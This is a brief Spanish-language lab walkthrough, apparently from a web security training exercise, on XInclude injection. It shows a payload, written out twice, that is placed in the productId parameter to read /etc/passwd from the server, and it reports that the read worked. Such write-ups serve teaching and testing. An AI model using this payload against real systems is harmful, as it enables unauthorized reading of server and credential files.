
Lab: Exploiting XInclude to retrieve files
Al interceptar la request podemos observar que este envia dos parametros que son productId y storeId

Para poder leer el archivo /etc/passwd usaremos los siguiente payloads, que ingresaremos en el parámetro de productId.
c
<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>
Podemos observar que logramos leer el archivo /etc/passwd